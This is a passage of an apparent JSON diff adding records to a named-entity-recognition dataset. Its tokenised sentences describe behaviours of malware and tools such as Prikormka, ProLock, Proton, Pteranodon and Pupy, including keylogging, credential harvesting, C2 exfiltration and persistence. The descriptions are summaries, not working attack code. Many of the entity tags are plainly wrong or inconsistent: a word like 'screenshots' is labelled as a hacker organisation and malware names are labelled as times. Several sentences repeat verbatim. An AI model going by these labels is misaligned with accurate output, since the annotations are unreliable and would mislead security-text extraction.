"simple", + "XOR", + "operation", + "or", + "encoded", + "with", + "Base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "encrypting", + "its", + "own", + "log", + "files,", + "the", + "log", + "encryption", + "module", + "in", + "Prikormka", + "deletes", + "the", + "original,", + "unencrypted", + "files", + "from", + "the", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "about", + "the", + "paths,", + "size,", + "and", + "creation", + "time", + "of", + "files", + "with", + "specific", + "file", + "extensions,", + "but", + "not", + "the", + "actual", + "content", + "of", + "the", + "file." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "contains", + "a", + "keylogger", + "module", + "that", + "collects", + "keystrokes", + "and", + "the", + "titles", + "of", + "foreground", + "windows." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "creates", + "a", + "directory,", + "<code>%USERPROFILE%\\AppData\\Local\\SKC\\</code>,", + "which", + "is", + "used", + "to", + "store", + "collected", + "log", + "files." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "on", + "available", + "printers", + "and", + "disk", + "drives." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "adds", + "itself", + "to", + "a", + "Registry", + "Run", + "key", + "with", + "the", + "name", + "guidVGA", + "or", + "guidVSA." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Prikormka", + "uses", + "rundll32.exe", + "to", + "load", + "its", + "DLL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "contains", + "a", + "module", + "that", + "captures", + "screenshots", + "of", + "the", + "victim's", + "desktop." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "from", + "the", + "victim", + "about", + "installed", + "anti-virus", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "encodes", + "C2", + "traffic", + "with", + "Base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "encrypts", + "some", + "C2", + "traffic", + "with", + "the", + "Blowfish", + "cipher." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "from", + "the", + "victim", + "about", + "Windows", + "OS", + "version,", + "computer", + "name,", + "battery", + "info,", + "and", + "physical", + "memory." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "from", + "the", + "victim", + "about", + "its", + "IP", + "addresses", + "and", + "MAC", + "addresses." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "information", + "from", + "the", + "victim", + "about", + "the", + "current", + "user", + "name." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "use", + "BITS", + "jobs", + "to", + "download", + "its", + "malicious", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "encrypt", + "files", + "on", + "a", + "compromised", + "host", + "with", + "RC6,", + "and", + "encrypts", + "the", + "key", + "with", + "RSA-1024." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "use", + "CVE-2019-0859", + "to", + "escalate", + "privileges", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "remove", + "files", + "containing", + "its", + "payload", + "after", + "they", + "are", + "executed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "use", + "vssadmin.exe", + "to", + "remove", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "use", + ".jpg", + "and", + ".bmp", + "files", + "to", + "store", + "its", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProLock", + "can", + "use", + "WMIC", + "to", + "execute", + "scripts", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "zips", + "up", + "files", + "before", + "exfiltrating", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "removes", + "logs", + "from", + "<code>/var/logs</code>", + "and", + "<code>/Library/logs</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "gathers", + "credentials", + "for", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "uses", + "an", + "encrypted", + "file", + "to", + "store", + "commands", + "and", + "configuration", + "values." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "kills", + "security", + "tools", + "like", + "Wireshark", + "that", + "are", + "running." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "removes", + "all", + "files", + "in", + "the", + "/tmp", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Proton", + "prompts", + "users", + "for", + "their", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "gathers", + "credentials", + "in", + "files", + "for", + "keychains." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "uses", + "a", + "keylogger", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Proton", + "persists", + "via", + "Launch", + "Agent." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Proton", + "gathers", + "credentials", + "in", + "files", + "for", + "1password." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "captures", + "the", + "content", + "of", + "the", + "desktop", + "with", + "the", + "screencapture", + "binary." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "modifies", + "the", + "tty_tickets", + "line", + "in", + "the", + "sudoers", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Proton", + "uses", + "macOS'", + ".command", + "file", + "type", + "to", + "script", + "actions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proton", + "uses", + "VNC", + "to", + "connect", + "into", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "automatically", + "collects", + "data", + "about", + "the", + "victim", + "and", + "sends", + "it", + "to", + "the", + "control", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "can", + "overwrite", + "files", + "indicated", + "by", + "the", + "attacker", + "before", + "deleting", + "them." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "searches", + "the", + "local", + "system", + "and", + "gathers", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "performs", + "data", + "exfiltration", + "over", + "the", + "control", + "server", + "channel", + "using", + "a", + "custom", + "protocol." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "can", + "delete", + "files", + "indicated", + "by", + "the", + "attacker", + "and", + "remove", + "itself", + "from", + "disk", + "using", + "a", + "batch", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "lists", + "files", + "in", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "lists", + "processes", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "gathers", + "product", + "names", + "from", + "the", + "Registry", + "key:", + "<code>HKLM\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion", + "ProductName</code>", + "and", + "the", + "processor", + "description", + "from", + "the", + "Registry", + "key", + "<code>HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", + "ProcessorNameString</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "registers", + "itself", + "as", + "a", + "service", + "on", + "the", + "victim’s", + "machine", + "to", + "run", + "as", + "a", + "standalone", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "collects", + "the", + "OS", + "version,", + "country", + "name,", + "MAC", + "address,", + "computer", + "name,", + "physical", + "memory", + "statistics,", + "and", + "volume", + "information", + "for", + "all", + "drives", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "collects", + "the", + "network", + "adapter", + "information", + "and", + "domain/username", + "information", + "based", + "on", + "current", + "remote", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "part", + "of", + "the", + "data", + "reconnaissance", + "phase,", + "Proxysvc", + "grabs", + "the", + "system", + "time", + "to", + "send", + "back", + "to", + "the", + "control", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "uses", + "HTTP", + "over", + "SSL", + "to", + "communicate", + "commands", + "with", + "the", + "control", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxysvc", + "executes", + "a", + "binary", + "on", + "the", + "system", + "and", + "logs", + "the", + "results", + "into", + "a", + "temp", + "file", + "by", + "using:", + "<code>cmd.exe", + "/c", + "\"<file_path>", + ">", + "%temp%\\PM*", + ".tmp", + "2>&1\"</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "PsExec", + "has", + "the", + "ability", + "to", + "remotely", + "create", + "accounts", + "on", + "target", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PsExec", + "can", + "be", + "used", + "to", + "download", + "or", + "upload", + "a", + "file", + "over", + "a", + "network", + "share." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PsExec,", + "a", + "tool", + "that", + "has", + "been", + "used", + "by", + "adversaries,", + "writes", + "programs", + "to", + "the", + "<code>ADMIN$</code>", + "network", + "share", + "to", + "execute", + "commands", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "Sysinternals", + "PsExec", + "is", + "a", + "popular", + "administration", + "tool", + "that", + "can", + "be", + "used", + "to", + "execute", + "binaries", + "on", + "remote", + "systems", + "using", + "a", + "temporary", + "Windows", + "service." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PsExec", + "can", + "leverage", + "Windows", + "services", + "to", + "escalate", + "privileges", + "from", + "administrator", + "to", + "SYSTEM", + "with", + "the", + "<code>-s</code>", + "argument." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Psylo", + "exfiltrates", + "data", + "to", + "its", + "C2", + "server", + "over", + "the", + "same", + "protocol", + "as", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Psylo", + "has", + "commands", + "to", + "enumerate", + "all", + "storage", + "devices", + "and", + "to", + "find", + "all", + "files", + "that", + "start", + "with", + "a", + "particular", + "string." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Psylo", + "has", + "a", + "command", + "to", + "download", + "a", + "file", + "to", + "the", + "system", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Psylo", + "has", + "a", + "command", + "to", + "conduct", + "timestomping", + "by", + "setting", + "a", + "specified", + "file’s", + "timestamps", + "to", + "match", + "those", + "of", + "a", + "system", + "file", + "in", + "the", + "System32", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Psylo", + "uses", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "decrypt", + "encrypted", + "data", + "strings", + "prior", + "to", + "using", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "use", + "a", + "dynamic", + "Windows", + "hashing", + "algorithm", + "to", + "map", + "API", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "exfiltrates", + "screenshot", + "files", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "delete", + "files", + "that", + "may", + "interfere", + "with", + "it", + "executing.", + "It", + "also", + "can", + "delete", + "temporary", + "files", + "and", + "itself", + "after", + "the", + "initial", + "script", + "executes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "identifies", + "files", + "matching", + "certain", + "file", + "extension", + "and", + "copies", + "them", + "to", + "subdirectories", + "it", + "created." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "creates", + "various", + "subdirectories", + "under", + "<code>%Temp%\\reports\\%</code>", + "and", + "copies", + "files", + "to", + "those", + "subdirectories.", + "It", + "also", + "creates", + "a", + "folder", + "at", + "<code>C:\\Users\\<Username>\\AppData\\Roaming\\Microsoft\\store</code>", + "to", + "store", + "screenshot", + "JPEG", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "use", + "mshta.exe", + "to", + "execute", + "an", + "HTA", + "file", + "hosted", + "on", + "a", + "remote", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "has", + "used", + "various", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "copies", + "itself", + "to", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "executes", + "functions", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Pteranodon", + "schedules", + "tasks", + "to", + "invoke", + "its", + "components", + "in", + "order", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "capture", + "screenshots", + "at", + "a", + "configurable", + "interval." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "has", + "the", + "ability", + "to", + "use", + "anti-detection", + "functions", + "to", + "identify", + "sandbox", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "use", + "a", + "malicious", + "VBS", + "file", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pteranodon", + "can", + "use", + "`cmd.exe`", + "for", + "execution", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "compress", + "data", + "with", + "Zip", + "before", + "sending", + "it", + "over", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy's", + "default", + "encryption", + "for", + "its", + "C2", + "communication", + "channel", + "is", + "SSL,", + "but", + "it", + "also", + "has", + "transport", + "options", + "for", + "RSA", + "and", + "AES." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "record", + "sound", + "with", + "the", + "microphone." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "bypass", + "Windows", + "UAC", + "through", + "either", + "DLL", + "hijacking,", + "eventvwr,", + "or", + "appPaths." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "Lazagne", + "for", + "harvesting", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "a", + "module", + "to", + "clear", + "event", + "logs", + "with", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "Lazagne", + "for", + "harvesting", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "Lazagne", + "for", + "harvesting", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "Lazagne", + "for", + "harvesting", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "user", + "PowerView", + "to", + "execute", + "“net", + "user”", + "commands", + "and", + "create", + "domain", + "accounts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "migrate", + "into", + "another", + "process", + "using", + "reflective", + "DLL", + "injection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "send", + "screenshots", + "files,", + "keylogger", + "data,", + "files,", + "and", + "recorded", + "audio", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "walk", + "through", + "directories", + "and", + "recursively", + "search", + "for", + "strings", + "in", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "upload", + "and", + "download", + "to/from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "uses", + "a", + "keylogger", + "to", + "capture", + "keystrokes", + "it", + "then", + "sends", + "back", + "to", + "the", + "server", + "after", + "it", + "is", + "stopped." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "sniff", + "plaintext", + "network", + "credentials", + "and", + "use", + "NBNS", + "Spoofing", + "to", + "poison", + "name", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "Lazagne", + "for", + "harvesting", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "execute", + "Lazagne", + "as", + "well", + "as", + "Mimikatz", + "using", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "uses", + "PowerView", + "and", + "Pywerview", + "to", + "perform", + "discovery", + "commands", + "such", + "as", + "net", + "user,", + "net", + "group,", + "net", + "local", + "group,", + "etc." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "user", + "PowerView", + "to", + "execute", + "“net", + "user”", + "commands", + "and", + "create", + "local", + "system", + "accounts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "interact", + "with", + "a", + "victim’s", + "Outlook", + "session", + "and", + "look", + "through", + "folders", + "and", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "a", + "built-in", + "module", + "for", + "port", + 